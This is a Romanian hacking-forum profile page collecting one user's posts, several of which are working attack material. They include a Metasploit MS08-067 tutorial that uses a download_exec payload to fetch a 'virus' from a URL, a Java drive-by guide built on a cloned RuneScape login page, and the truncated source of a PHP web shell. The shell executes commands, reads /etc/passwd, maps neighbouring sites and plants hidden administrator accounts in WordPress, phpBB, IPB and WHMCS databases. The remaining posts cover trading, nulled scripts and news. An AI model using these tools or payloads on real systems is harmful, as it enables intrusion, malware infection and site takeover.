Jump to content

iulik

Active Members
  • Posts

    702
  • Joined

  • Last visited

  • Days Won

    18

Everything posted by iulik

  1. Dau euro orange pe euro paypal: PayPal Orange 2 euro 1 euro 3 euro 2 euro 4 euro 3 euro 5 euro 6 euro 6 euro 5 euro 7 euro 6 euro 8 euro 7 euro ... ... 30 euro 29 euro Preturile nu sunt negociabile, ala e tabelul cu preturile. Atentie, dau euro orange nu paypal.
  2. Gata, ti-am trimis. Va multumesc la amandoi, nu mai am nevoie.
  3. Salut, am nevoie de 2 euro (paypal), dau in schimb 2 euro sms . Imi cer scuze ca nu am postat la market, am nevoie rapid. (dau eu primul la useri care sunt de incredere)
  4. Am modificat domeniul pe care era forumul si l-am lasat pe asta pentru scripturi nulled, pentru ca se potriveste mai bine. Probleme? + am pus si un script care iti listeaza cateva proxy-uri (50 proxy-uri, ele sunt functionale si intotdeauna vor aparea altele mai noi) Death-Zone Proxy list
  5. m-am exprimat eu gresit. Acum editez postul, mersi mersi pentru sfat, il voi aplica
  6. Cum arata? arata bine pentru un site de scripturi nulled? in curand voi adauga mai multe scripturi, teme nulled Death Zone
  7. Ai putea incepe cu programarea: PHP 5 Tutorial Dupa iti vei da seama cum sa faci si ce ai spus tu acolo.
  8. Avem nevoie de: 1. Nmap Nmap GUI for Windows | Free Development software downloads at SourceForge.net 2. Metasploit Penetration Testing Software | Metasploit 1. Ne trebuie ip-ul victimei, il putem afla usor cu urmatorul script php <? $file = "ip.txt"; $ip = $_SERVER['REMOTE_ADDR']; $handle = fopen($file, 'a'); fwrite($handle, "IP Address: "); fwrite($handle, "$ip"); fwrite($handle, "\n"); fclose($handle); ?> 2. Creeam o baza de date in metasploit Deschidem metasploit si scriem 'db_create' , sau daca am creat inainte o baza de date (avem deja o baza de date) scriem 'db_connect' 3. Scanam dupa ip Scriem in metasploit 'Nmap' dupa mai scriem 'nmap -sT -sV <ip victima>' Cand scanarea s-a terminat, avem detaliat detalile calculatorul victimei. 4. Exploit In consola, scriem 'use windows/smb/ms08_067_netapi' Dupa 'set target 0' Dupa 'show payloads' Dupa 'set payload / download_exec' Dupa 'Show options' Acum scriem: 'set URL http://www.site.com/xxx.exe' unde http://www.site.com/xxx.exe este calea, url sau cum vreti voi sa ii spuneti catre virusul creat. la final scriem 'exploit' Atentie, nu sunt responsabil pentru ce faceti. "Tutorial facut in scopuri educative" P.S: scrieti fara (ghilimelele) ' ' de ex 'exploit' scriem exploit Trebuie sa mearga fara probleme pe urmatoarele versiuni: Windows 2000, XP (toate service pack-urile)
  9. Ai nevoie de un host unde sa uploadezi: g.php k.js Facem un fisier txt sub numele data.txt si ii dam chmod 777 Exemplu de folosire:
  10. Easy steps on how to setup a FUD, Free and Easy Javadriveby. Anonyone could do this! With a simple Java Driveby, you can get slaves way STEP 1: First of all, you need this JDB package, it contains the .jar file and some pictures. When you set the JDB up you should upload ALL of these files in order to let it work. Download link: JDB package. Click here. STEP 2: Now we have all the files we need, its time to clone a website!I will be using the RuneScape login page as example: After you save it, you will receive the index.html and other files (you must upload all of those in order to work) STEP 3: Now its time to add our Java driveby applet code in the index.html by editing it with notepad or HTML-Kit We add in this code, at the top of the html code: <appletname='PleaseRunToContinue' width='1'height='1' code='taipans.class' archive='java.jar'><param name="funtime"value="DIRECTLINK HERE!!!"></applet> DONT FORGET TO ADD YOUR DIRECT LINK, at the space above! This will launch your virus, from the direct link. This is how it will look like: Press save, and save it again as index.html Now we have all our files, and they are ready to be uploaded to a webhost! STEP 4: Time for setting up the free webhost and upload all your files!If you already have a premium webhost/domain, upload your files to your own host. If you dont have a host, we will use this free webhost called Dolphhost. NOTE: If this free webhosting doesnt work for you, try a different one! There are plenty out there! (use the same steps as below) Visit Dolphhost here. Once there, register: After that, confirm your email. And then you will be ready to register a free domain! Once you have your domain registered, go to File Manager: In file manager, go to public_html (This is where we will upload all our JDB files) Once there, upload all of the three JDB package files + the edited index.html and DO NOT forget the other index files. You can easily upload these by zipping them, and then upload! After you have uploaded them, we are still not done! After uploading them, we need to give each file a permission (called chmodding) Select all your files: Press chmod, and then give ALL of the files all permissions: Now you are done! Lets see the result! There is your Fully working Java Driveby! Enjoy, sursa: http://www.viphackforums.net/showthread.php?tid=5473
  11. Debian has released patches for a pair of security vulnerabilities in the free operating system, including a security bypass flaw in the Nginx Web server. The other vulnerability lies in a Perl module used in the OS. The vulnerability in the HTTP: :Body Perl module could allow an attacker to run arbitrary commands on a vulnerable Debian server. “The HTTP body multipart parser creates temporary files which preserve the suffix of the uploaded file. An attacker able to upload files to a service that uses HTTP::Body::Multipart could potentially execute commands on the server if these temporary filenames are used in subsequent commands without further checks. This update restricts the possible suffixes used for the created temporary files,” the Debian advisory says. The second vulnerability is a bug in the Nginx Web server that enables an attacker to bypass the security restrictions in Debian. Found by Ivan Fratric of the Google security team, the vulnerability is a serious one. It “might allow an attacker to bypass security restrictions by using a specially crafted request,” Debian said in its advisory. Users running vulnerable versions of Debian are encouraged to upgrade as soon as possible.
  12. STOCKHOLM - Sweden said Thursday it will hand over one of the world's best-known computer hackers, Gottfrid Svartholm Warg, to neighboring Denmark where he is wanted for questioning on alleged hacking charges. "It (the extradition) will take place on November 27," the prosecutor in charge of the case, Henrik Olin, told AFP, adding that Sweden was responding to an arrest warrant issued by Copenhagen. In June, Danish police revealed that the 30-year-old Swedish hacker and co-founder of the file-sharing website, the Pirate Bay, is suspected of illegally downloading police files between April and August 2012. At the time Svartholm Warg was living in Cambodia but was later arrested and deported to Sweden in connection with another cyber crime. He is currently serving a one-year sentence in Sweden for hacking into the computer systems of contractors working for the national tax authority. In 2009 he was convicted to one year in jail and ordered to pay criminal damages to the music and film industry for his part in founding the Pirate Bay website, one of the biggest file-sharing services in the world at the time.
  13. Acest script listeaza proxy-uri sub forma ip: proxy depe hidemyass <?php $act = (isset($_GET['act']) && $_GET['act'] == "check") ? "check" : "none"; function checkSpan($input){ // Save style classes $match_exc_style = preg_replace("/.*([<]style\s*?[>])|([<]\W+style\s*?[>]).*/","", $input); $match_exc = preg_replace("/\s+/","", $match_exc_style); $match_exc = explode(".", $match_exc, 2); $match_exc = $match_exc[1]; $newSplit = explode(".", $match_exc); $arrClass = array(); foreach($newSplit as $class) { $class_exc = preg_replace("/{.*?}/","", $class); $class_val = preg_replace("/.*?{(.*?)}/","$1", $class); $arrClass[$class_exc] = $class_val; } //continue triming $match = str_replace($match_exc_style,"", $input); $match = preg_replace("/\s*[<]style[>]\s*?[<]\W+style\s*?[>]\s*/","", $match); $match = preg_replace("/[<]div\s+style\s*?\W+display\s*?\W\s*?none\s*?\W+?[>].*?[<].*?[>]/", "",$match); $match = preg_replace("/[<]span\s+style\s*?\W+display\s*?\W\s*?none\s*?\W+?[>].*?[<].*?[>]/", "",$match); $match = preg_replace("/[<]img.*?[>]/", "", $match); $match = preg_replace("/([<]span\s+class\s*?\W+\s*?country\s*?\W+?[>]\s+)(.*?)([<].*?[>])/", "$2",$match); $match = preg_replace("/([<]span\s+class\s*?\W+\s*?[0-9]+\s*?\W+?[>])(.*?)([<].*?[>])/", "$2",$match); $match = preg_replace("/([<]span\s+style\s*?\W+display\s*?\W\s*?inline\s*?\W+?[>])(.*?)([<].*?[>])/", "$2",$match); foreach($arrClass as $key => $class) { if($class == "display:none") $match=preg_replace("/([<]span\s+class\s*?\W+\s*?".$key."\s*?\W+?[>])(.*?)([<].*?[>])/","",$match); if($class == "display:inline") $match=preg_replace("/([<]span\s+class\s*?\W+\s*?".$key."\s*?\W+?[>])(.*?)([<].*?[>])/","$2",$match); } $match = preg_replace("/[<]span\s*?[>]\s*?[<]\W+.*?[>]/", "", $match); $match = preg_replace("/([<]span\s*?[>])(.*?)([<].*?[>])/", "$2",$match); return $match ; } function getContents() { $response = ""; $mama = file_get_contents("http://hidemyass.com/proxy-list/"); $mama = preg_replace("/(.*)?[<]\W+thead\s*?[>]/", "", $mama); $mama = preg_replace("/[<]thead\s*?[>]\s*/", "|+|+|+|", $mama); $mama = explode("|+|+|+|",$mama); $mama = $mama[1]; $mama = preg_replace("/\s*[<]\W+table\s*?[>]\s*/", "|+|+|+|", $mama); $mama = explode("|+|+|+|",$mama); $mama = $mama[0]; $mama = preg_replace("/\s*[<]\W+?tr\s*?[>]\s*?[<]tr.*?[>]\s*/","|+|+|+|", $mama); $mama = preg_replace("/\s*[<]\W+?tr\s*?[>]s*|s*[<]tr.*?[>]\s*/","", $mama); $mama = explode("|+|+|+|",$mama,2); $mama = $mama[1]; $newSplit = explode("|+|+|+|", $mama); $response .='<table style="border: 1px solid;" cellpadding=3 align=center WIDTH=60%> <tr align="center" style="border: 1px solid;" > <td style="border: 1px solid;">IP : Port</td> </tr>'; foreach($newSplit as $line) { $line = preg_replace("/\s*[<]\W+?td\s*?[>]\s*?[<]td.*?[>]\s*/","|+|+|+|", $line); $newSplit = explode("|+|+|+|",$line); $line = $newSplit[1]."|".$newSplit[2]."|".$newSplit[3]; $arrayView = checkSpan($line); $newline = explode("|",$arrayView,3); $response .='<tr align="center" style="border: 1px solid;" >'; $response .= "<td style='border: 1px solid;'><center>".$newline[0].":".$newline[1].""; //$response .= "<td style='border: 1px solid;'><center>".$newline[1]."</td>"; // //$response .= "<td style='border: 1px solid;'><center>".$newline[2]."</td></tr>"; // } $response .= "</table>"; return $response; } switch($act) { case "check": { echo getContents(); }break; default: { echo '<title>Proxy List @Crisalixx</title> <link rel="stylesheet" type=text/css href=./css/style.css /> <div align=center><img src=http://s23.postimg.org/5lmp7adbv/Untitled_1.png></img></div><center> <script type="text/JavaScript"> function xhr() { var xhr; if(window.XMLHttpRequest) { xhr = new XMLHttpRequest(); }else { xhr = new ActiveXObject("Microsoft.XMLHTTP"); } xhr.onreadystatechange = function() { if(xhr.readyState == 4 && xhr.status == 200) { document.getElementById("table").innerHTML = xhr.responseText;} } xhr.open("GET", "?act=check", false); xhr.send(null); } function timedRefresh() { xhr(); setTimeout(function(){timedRefresh();}, 10000); } </script> <body onload="timedRefresh();"><div id="table"></div></body>'; } } ?> ex output (generat recent): source: Proxy List(Generator)
  14. Ce aduce in plus acest shell : 1.Executa ,Evalueaza(cod PHP)!. 2.Listarea F/D este putin complicata (multumita lui NoValue pentru functiile de listarea si afisare a fisierelor si directoarelor)!. 3.Creaza Admin pe mai multe platforme Web!. 4.Afisarea userilor advance!. <?php session_start(); error_reporting(0); stylemenu(); global $user; global $pass; $user ='0be302f9'; //thieves $pass ='0be302f9'; //thieves $afiseaza='<form method="post" action=""> <center>User:<input type="text" name="user" id="text"><br> Pass:<input type="password" name="pass" id="text"><br> <input type="submit" name="sesiuni" value="login" id="but">'; if(isset($_SESSION['user']) & isset($_SESSION['pass']) & @$_SESSION['user']== $user & @$_SESSION['user']==$pass) { $continut='No Text'; function rlc() { $afiseaza='<center><pre> ___________.__ .__ \__ ___/| |__ |__| _______ __ ____ ______ | | | | \| |/ __ \ \/ // __ \ / ___/ | | | Y \ \ ___/\ /\ ___/ \___ \ |____| |___| /__|\___ >\_/ \___ >____ > \/ \/ \/ \/ </pre></center>'; return $afiseaza; } function copyright() { $afiseaza='<br>Create by (|Crisalixx && Master|) <a href="http://thieves-team.com">Thieves-Team</a></a>'; return $afiseaza; } function proprietati(){ $afiseaza='Work Directory: '.@getcwd().'<br>'; $afiseaza.='Current User: '.@get_current_user().'<br>'; $afiseaza.='HostName:'.$_SERVER['SERVER_NAME'].'<br>'; $afiseaza.='Platform:'.$_SERVER['SERVER_SIGNATURE'].'<br>'; $afiseaza.='OS Version: '.@php_uname().'<br>'; $afiseaza.='My ipaddress: '.$_SERVER['REMOTE_ADDR'].'<br>'; $afiseaza.='Host Address: '.$_SERVER['SERVER_ADDR'].'<br>'; if(strpos(strtolower(PHP_OS),'win')<0){ $afiseaza.='UID : '.@posix_getuid().'/'.@get_current_user().'</br>'; } $val=@disk_total_space(getcwd()); $rezultat=round($val/1073741824,2); $afiseaza.='HDD Size: '.$rezultat.' GB'; $val=@disk_free_space(getcwd()); $rezultat=round($val/1073741824,2); $afiseaza.='Free Space: '. $rezultat.' GB'.'</br>'; if (@ini_get('safpassthrue_mode') or strtolower(@ini_get('safe_mode')) == 'on'){ $afiseaza.='Safe-mode: ON(security)</br>'; }else{ $afiseaza.='Safe-mode:OFF(Fuck Them ALl)</br>'; } if (@ini_get('open_basedir') or strtolower(@ini_get('open_basedir')) == 'on'){ $afiseaza.='Open_basedir: ON(security)</br>'; }else{ $afiseaza.='Open_basedir:OFF(Fuck Them ALl)</br>'; } if (function_exists('curl_init')){ $afiseaza.='cURL: ON</br>'; }else{ $afiseaza.='cURL:Off</br>'; } return $afiseaza; } function executa_shell(){ $afiseaza='<center>Shell Command</center><br><br>'; $afiseaza.='<br><br><form method="post" action="?action&home"> <center><textarea id="textarea" name=ViewCode rows="15" cols="100">'; if(isset($_POST['exe'])){ $linie=trim(strip_tags($_POST['com'])); $afiseaza.=ValidExeCommand($linie); }elseif(isset($_POST['touchB'])){ $touch = $_POST['touch']; $timetouch = strtotime($_POST['touchdate']); $afiseaza.= touch($touch,$timetouch); $afiseaza.= ValidExeCommand("ls -al"); }elseif(isset($_POST['arhBt']) && isset($_POST['arhFile']) && $_POST['arhFile'] != ""){ $dirr = getcwd(); $afiseaza.= ValidExeCommand("tar -cvf ".$_POST['arhFile']." ".$dirr."/"); }elseif(isset($_POST['EvalS']) && isset($_POST['ViewCode']) && $_POST['ViewCode'] != ""){ $code = base64_encode(urldecode($_POST['ViewCode'])); ob_start(); eval(base64_decode($code)); $eval_buffer = ob_get_contents(); ob_end_clean(); $afiseaza.= $eval_buffer; }elseif(isset($_POST['btnFile']) && isset($_POST['ViewCode']) && $_POST['ViewCode'] != ""){ $fisier=fopen($_POST['newfile'],"w+"); if(fwrite($fisier,$_POST['ViewCode'])){ $afiseaza.='Success create new file '.$_POST['newfile']; $afiseaza.= ValidExeCommand("ls -al"); }else{ $afiseaza.='Error create file you can\'t have access!'; } fclose($fisier); }elseif(isset($_POST['btnFolder'])){ $chmod = ""; if($_POST['chmodFolder'] != ""){ $chmod = $_POST['chmodFolder']; } mkdir($_POST['newfolder'].$_POST['newfolderN'],(is_numeric($chmod)?intval($chmod):0755)); $afiseaza.= ValidExeCommand("ls -al"); } $afiseaza.='</textarea><br><br>'; $afiseaza.='<input id="text" type="text" name="com" size=50>'; $afiseaza.='<input id="but" type="submit" name="exe" value="Execute"> <input id="but" type="submit" name="EvalS" value="Eval(PHP)"></center>'; $afiseaza.='<br> <table align=center style="border:1px solid" width=100%> <tr> <td align=left>Touch Time: <input id="text" type="text" name="touch" placeholder="nume.txt"> <input id="text" type="text" name="touchdate" placeholder="date" size=40> <input id="but" type="submit" name="touchB" value="Enter"> </td> <td align=right>Folder Path: <input id="text" type="text" name="arhFile" placeholder="/home/user/public_html/" size=40> <input id="but" type="submit" name="arhBt" value="Compress"> </td> </tr> </table>'; $afiseaza.='<br> <table align=center style="border:1px solid" width=100%> <tr> <td align=left>New File: <input id="text" type="text" name="newfile" placeholder="nume.txt" size=40> Chmod:<input id="text" type="text" name="chmodFile" placeholder="0644" size=10> <input id="but" type="submit" name="btnFile" value="Create"> </td> <td align=right>New Folder: <input id="text" type="text" name="newfolder" placeholder="./" size=40><input id="text" type="text" name="newfolderN" placeholder="crisalixx" size=20> Chmod:<input id="text" type="text" name="chmodFolder" placeholder="0777" size=10> <input id="but" type="submit" name="btnFolder" value="Create"> </td> </tr> </table>'; $afiseaza.='</form>'; return $afiseaza; } function ValidExeCommand($ex){ $functionList = array("shell_exec","system","exec","passthru"); if(function_exists($functionList[0]) && $functionList[0] !== 1){ return $functionList[0]($ex); }elseif(function_exists($functionList[1]) && $functionList[1] !== 1){ return $functionList[1]($ex); }elseif(function_exists($functionList[2]) && $functionList[2] !== 1){ return $functionList[2]($ex); }elseif(function_exists($functionList[3]) && $functionList[3] !== 1){ return $functionList[3]($ex); }else{ echo "Insert PHP CODE!"; } } function upload(){ $afiseaza.= "<table align='center' width=100%> <tr align='center'><td colspan=1000><b> Uploading by server ...</b></td></tr> <tr align='center'><td><form action='{$_SERVER['PHP_SELF']}?{$_SERVER['QUERY_STRING']}' method='post' enctype='multipart/form-data'> <input type='hidden' name='securitytoken' value='1336837095-ee4b45b8ab556c82309783ea414b9eefadc6d135'> Upload File:<input type='file' name='upfile' id='upfile'> With Name:<input type='text' name='myfile_rot' placeholder=thievesteam.txt>Destionation file:<input type=text name=desti size=30 placeholder=/home/user/public_html/> <input type='submit' value='Submit'></form></td></tr>"; if(isset($_POST['myfile_rot'])) { if(isset($_POST['desti'])){ $mydestination = $_POST['desti']; }else{ $mydestination= dirname(__FILE__)."/"; } if ($_FILES['upfile']['error'] > 0){ $afiseaza.= "<tr align='center'><td><font color=red>Error: Impossible to upload file.</font></td></tr>"; }else { $afiseaza.= "<tr align='center'><td>Uploaded <b>" . $_FILES['upfile']['name'] . "</b> and stored into: <b>" . $_FILES['upfile']['tmp_name']. "</b></td></tr>"; if(move_uploaded_file($_FILES['upfile']['tmp_name'], $mydestination.$_POST['myfile_rot'])) { $afiseaza.= "<tr align='center'><td>Moved from ". $_FILES['upfile']['tmp_name'] ." into <b>".$mydestination . $_POST['myfile_rot']. "</b></td></tr>"; }else if(rename($_FILES['upfile']['tmp_name'], $_SERVER["DOCUMENT_ROOT"] . "/" . $_POST['myfile_rot'])){ $afiseaza.= "<tr align='center'><td>Renamed from ".$_FILES['upfile']['tmp_name']." to <b>". $mydestination .$_POST['myfile_rot']. "</b></td></tr>"; }else $afiseaza.= "<tr align='center'><td><font color=red>Error: It`s impossible to move/rename the file from the temp.</font></td></tr>"; } } $afiseaza.= "</table>"; return($afiseaza); } function rd_users(){ $afiseaza=''; $afiseaza.= "<style>table.hov tr:hover, table.hov tr td:hover{background-color: #262626; }</style> <table border='1' cellpadding='3' align='center' WIDTH='90%' class=hov> <tr><td>User</td> <td align=center>Group</td> <td align=center>Path</td> <td align=center>Acess</td> <td align=center>CMS</td> <td align=center>Domains</td></tr>"; $tfile = fopen("/etc/passwd", "r"); // $DomFile = fopen("/etc/named.conf") ; while(!feof($tfile)){ $strs = fgets($tfile); $str=explode(':',$strs); $afiseaza.= "<tr>"; $afiseaza.= "<td>".trim($str[0])."</td> <td>".trim($str[4])."</td> <td>".trim($str[5])."</td>"; if(is_readable(trim($str[5])."/public_html/")){ $afiseaza.="<td><font color=yellow>Can Read</font></td>"; }else{ $afiseaza.="<td>Can't Read</td>"; } if(file_exists(trim($str[5]).'/public_html/mcp.php') & file_exists(trim($str[5]).'/public_html/config.php') || is_dir(trim($str[5]).'/public_html/forum/store') || is_dir(trim($str[5]).'/public_html/board/store')){ $afiseaza.="<td>PHPBB</td>"; }elseif(file_exists(trim($str[5]).'/public_html/wp-login.php') & file_exists(trim($str[5]).'/public_html/wp-config.php') || is_dir(trim($str[5]).'/public_html/blog/wp-admin') || is_dir(trim($str[5]).'/public_html/site/wp-admin')){ $afiseaza.="<td>WordPress</td>"; }elseif(file_exists(trim($str[5]).'/public_html/moderation.php') & file_exists(trim($str[5]).'/public_html/usercp2.php')|| file_exists(trim($str[5]).'/public_html/forum/moderation.php') || file_exists(trim($str[5]).'/public_html/board/moderation.php')){ $afiseaza.="<td>MyBB</td>"; }elseif(file_exists(trim($str[5]).'/public_html/Settings.php') & file_exists(trim($str[5]).'/public_html/subscriptions.php')|| file_exists(trim($str[5]).'/public_html/forum/Settings.php') || file_exists(trim($str[5]).'/public_html/board/subscriptions.php')){ $afiseaza.="<td>SMF</td>"; }elseif(is_dir('/home/'.trim($str[5]).'/public_html/admincp') & file_exists('/home/'.trim($str[5]).'/public_html/modcp') || (is_dir('/home/'.trim($str[5]).'/public_html/forum/admincp') & file_exists('/home/'.trim($str[5]).'/public_html/forum/modcp'))|| (is_dir('/home/'.trim($str[5]).'/public_html/board/admincp') & file_exists('/home/'.trim($str[5]).'/public_html/board/modcp'))){ $afiseaza.="<td>VBulletin</td>"; }elseif(file_exists('/home/'.trim($str[5]).'/public_html/libraries/platform.php') & is_dir('/home/'.trim($str[5]).'/public_html/media')){ $afiseaza.="<td>Joomla</td>"; }else{ $afiseaza.="<td>Unknown!</td>"; } if($scan= @scandir(trim($str[5]).'/tmp/cpbandwidth/')){ foreach($scan as $s){ if ($s!= "." && $s != ".."){ $domains=explode('-bytes',$s); $afiseaza.='<td><a href="http://'.$domains[0].'" target=_blank>'.$domains[0].'</a></td>'; } } }else{ $afiseaza.="<td>Can't Read</td>"; } $afiseaza.= "</tr>"; } $afiseaza.="</table>"; fclose($tfile); return $afiseaza; } function despre_rlc(){ $afiseaza='Thieves was rewrite by Crisalixx@thieves-team.com<br>'; $afiseaza.='1.New Design<br>'; $afiseaza.='2.File and Folders(list) was create by NoValue@thieves-team.com<br>'; $afiseaza.='3.Create from rlc 1.0 by Master@thieves-team.com<br>'; $afiseaza.='4.New Stuff (Brute Force MD5 , Make Admin)<br>'; $afiseaza.='5.Evaluate PHP function on Exec Command<br>'; $afiseaza.='6.Safe and easy to understand<br><br>'; $afiseaza.='Finish Date : September-12-2013 at 3:30 AM'; return $afiseaza; } function makeJoomla(){ } function makePHPBB(){ $dbhost = "localhost"; $dbuser = $_POST['UserName']; $dbpasswd = $_POST['PassAdmin']; $dbname = $_POST['DataAdmin']; $table_prefix = $_POST['prefix']; $email = $_POST['EmailAdmin']; mysql_connect($dbhost,$dbuser,$dbpasswd); mysql_select_db($dbname); $pass=md5("crisalixx"); $int2="INSERT INTO ".$table_prefix."users VALUES('100000',3,5,'zik0zjzik0zjzik0xs i1cjyo000000 zik0zjzhb2tc', '0','127.0.0.1','1290805769','ThievesAdmin','ThievesAdmin','".$pass."',0,0,'".$email."',0,'','',0,0,'','',0,0,0,0,0,0,'1337', 'en','0.00',0,1,1,'','0',0,0,0,0,0,0,0,'t','d',0,'t','a',0,1,0,1,1,1,1,'230271','',0,0,0,'thieves-team.com','','','','','','', '','','','','','','','',1,0,1)"; $int="INSERT INTO ".$table_prefix."users (user_id,user_type,group_id,user_permissions,username,user_password,user_email) VALUES( '10000','3','5','zik0zjzik0zjzik0xs i1cjyo000000 zik0zjzhb2tc','ThievesAdmin','".$pass."'),'".$email."')"; $query=mysql_query($int2); if(!$query){ $afiseaza.= mysql_error(); }else{ $afiseaza.= "Admin Success!"; } return $afiseaza; } function makeIPB(){ $dbhost = "localhost"; $dbuser = $_POST['UserName']; $dbpasswd = $_POST['PassAdmin']; $dbname = $_POST['DataAdmin']; $table_prefix = $_POST['prefix']; $email = $_POST['EmailAdmin']; mysql_connect($dbhost,$dbuser,$dbpasswd); mysql_select_db($dbname); $pass=md5("crisalixx"); $int2 = "INSERT INTO members (name,member_group_id,email,joined,ip_address,posts,title,allow_admin_mails,ignored_users,members_pass_hash,members_pass_salt,member_login_key,member_login_key_expire) VALUES ('ThievesAd', '4', '".$email."', '1365869413', '127.0.0.1', '100', 'GOD Was Here!', '0', '0', '88b9e4f1c41f86106b729b706b3ed6a0','V,vCT', 'ff77653acc1ddaf236144a80c85057b8', '1367489996')"; $query=mysql_query($int2); if(!$query){ $afiseaza.= mysql_error(); }else{ $afiseaza.= "Admin Success!"; } return $afiseaza; } function makeWordPress(){ $dbhost = "localhost"; $dbuser = $_POST['UserName']; $dbpasswd = $_POST['PassAdmin']; $dbname = $_POST['DataAdmin']; $table_prefix = $_POST['prefix']; $email = $_POST['EmailAdmin']; mysql_connect($dbhost,$dbuser,$dbpasswd); mysql_select_db($dbname); $query2 = "INSERT INTO ".$table_prefix."users(ID,user_login,user_pass,user_nicename,user_email,user_url, user_registered,user_activation_key,user_status,display_name) VALUES ('4', 'ThievesAdmin', MD5('crisalixx'), 'Thieves Admin', '".$email."', 'http://www.thieves-team.com/', '2013-06-07 00:00:00', '', '0', 'Thieves Admin')"; $query3 = "INSERT INTO ".$table_prefix."usermeta (user_id,meta_key,meta_value) VALUES ('4', '".$table_prefix."capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"; $query4 = "INSERT INTO ".$table_prefix."usermeta(user_id,meta_key,meta_value) VALUES ('4', '".$table_prefix."user_level', '10')"; $queryString1=mysql_query($query2); $queryString2=mysql_query($query3); $queryString3=mysql_query($query4); if(!$queryString1 || !$queryString2 || !$queryString3){ $afiseaza.= mysql_error(); }else{ $afiseaza.= "Admin Success!"; } return $afiseaza; } function makeWHMCS(){ $dbhost = "localhost"; $dbuser = $_POST['UserName']; $dbpasswd = $_POST['PassAdmin']; $dbname = $_POST['DataAdmin']; $table_prefix = $_POST['prefix']; $email = $_POST['EmailAdmin']; mysql_connect($dbhost,$dbuser,$dbpasswd); mysql_select_db($dbname); $query2 = "INSERT INTO tbladmins (roleid,username,password,email,template,language,supportdepts,homewidgets) VALUES ('1', 'ThievesAd', 'MD5('crisalixx')', '".$email."', 'blend', 'English', ',,1,2,3', 'getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')"; $queryString1=mysql_query($query2); if(!$queryString1){ $afiseaza.= mysql_error(); }else{ $afiseaza.= "Admin Success!"; } return $afiseaza; } function cmsCommand(){ if(isset($_POST['PHPBBAdmin'])){ makePHPBB(); }elseif(isset($_POST['MYBBAdmin'])){ $afiseaza.= "Will be Soon"; }elseif(isset($_POST['IPBAdmin'])){ makeIPB(); }elseif(isset($_POST['IPBAdmin'])){ makeIPB(); }elseif(isset($_POST['WHMCSAdmin'])){ makeWHMCS(); }elseif(isset($_POST['JoomlaAdmin'])){ $afiseaza.= "Will be Soon"; } $afiseaza.='<div align="center">UserName will be : ThievesAdmin <br> Password will be : crisalixx<br><form action=?action&cms method="post"> <table border=1 cellpadding=5 align=center> <tr><td><input type="text" placeholder=UserName name="UserAdmin" align="center" size="30" STYLE="color:#3cbddd; background-color: #242528;" width="8"><input placeholder=Password type="text" name="PassAdmin" align="center" size="30" STYLE="color:#3cbddd; background-color: #242528;" width="8"> <input type="text" name="DataAdmin" placeholder="DataBase" align="center" size="30" STYLE="color:#3cbddd; background-color: #242528;" width="8"><br><br> <center><input type="text" name="prefix" placeholder=Prefix_ align="center" size="10" STYLE="color:#3cbddd; background-color: #242528;" width="8"> <input type="text" name="EmailAdmin" placeholder="Crisalixx@thieves-team.com" align="center" size="30" STYLE="color:#3cbddd; background-color: #242528;" width="8"></center> <br><center><input type="radio" name="JoomlaAdmin" value="Joomla"><font color=#3cbddd>Joomla</font> <input type="radio" name="WHMCSAdmin" value="WHMCS"><font color=#3cbddd>WHMCS</font> <input type="radio" name="PHPBBAdmin" value="PHPBB"><font color=#3cbddd>PHPBB</font> <input type="radio" name="MYBBAdmin" value="MYBB"><font color=#3cbddd>MYBB</font> <input type="radio" name="VBAdmin" value="VBULETIN"><font color=#3cbddd>VBULETIN</font> <input type="radio" name="IPBAdmin" value="IPBAdmin"><font color=#3cbddd>IPB</font> <input type="radio" name="WordPress" value="WordPress"><font color=#3cbddd>WordPress</font></center> <br><center><input type=submit value="MakeAdmin" name="MakeAdmin" STYLE="color:#3cbddd; background-color: #121011; border-style:flat;"></center> </td></tr></table></form>'; return $afiseaza; } function insert_admin_mybb() { $af=''; if(isset($_POST['config'])) { $include=$_POST['config']; if(strpos($include,'config.php')>-1) { @include($include); if(isset($config['database']['type'] )) { mysql_connect($config['database']['hostname'],$config['database']['username'],$config['database']['password']); mysql_select_db($config['database']['database']); $pass=md5($_POST['pass']); $int=""; } else{$af='Acest config nu este valid';} } else {$af='Nu ai introdus un config';} } $afiseaza='<table align="center"><tr><td><form method="post" action="?action=cms&new_action=mybb">'; $afiseaza.='<tr><td>MYBB:</td><td> Admin insert in DB</td></tr>'; $afiseaza.='<tr><td>User:</td><td><input type="text" name="user" id="text"></td></tr>'; $afiseaza.='<tr><td>Pass:</td><td><input type="text" name="pass" id="text"></td></tr>'; $afiseaza.='<tr><td>Email:</td><td><input type="text" name="email" id="text"></td></tr>'; $afiseaza.='<tr><td>Culoare:</td><td><input type="text" name="culoare" id="text"></td></tr>'; $afiseaza.='<tr><td>Config:</td><td><input type="text" name="config" value="/inc/config.php" id="text"></td></tr>'; $afiseaza.='<tr><td><input type="submit" name="submit" value="insert" id="but"></td></tr></table>'; return $afiseaza.$af; } function logout(){ unset($_SESSION['user']); unset($_SESSION['pass']); return $afiseaza='Logout Success'; } function md5_crack(){ if(!file_exists("pass.txt")){ $afiseaza.= "<table align='center' width=100%> <tr align='center'><td colspan=1000><b> Uploading by server ...</b></td></tr> <tr align='center'><td><form action='{$_SERVER['PHP_SELF']}?{$_SERVER['QUERY_STRING']}' method='post' enctype='multipart/form-data'> <input type='hidden' name='securitytoken' value='1336837095-ee4b45b8ab556c82309783ea414b9eefadc6d135'> Upload File:<input type='file' name='upfile' id='upfile'> With Name:<input type='text' name='myfile_rot'><input type='submit' value='Submit'></form></td></tr>"; if(isset($_POST['myfile_rot'])) { if ($_FILES['upfile']['error'] > 0){ $afiseaza.= "<tr align='center'><td><font color=red>Error: Impossible to upload file.</font></td></tr>"; }else { $afiseaza.= "<tr align='center'><td>Uploaded <b>" . $_FILES['upfile']['name'] . "</b> and stored into: <b>" . $_FILES['upfile']['tmp_name']. "</b></td></tr>"; if(move_uploaded_file($_FILES['upfile']['tmp_name'],dirname(__FILE__)."/" . $_POST['myfile_rot'])) { $afiseaza.= "<tr align='center'><td>Moved from ". $_FILES['upfile']['tmp_name'] ." into <b>". $_SERVER["DOCUMENT_ROOT"]. "/" . $_POST['myfile_rot']. "</b></td></tr>"; }else if(rename($_FILES['upfile']['tmp_name'],dirname()."/" . $_POST['myfile_rot'])){ $afiseaza.= "<tr align='center'><td>Renamed from 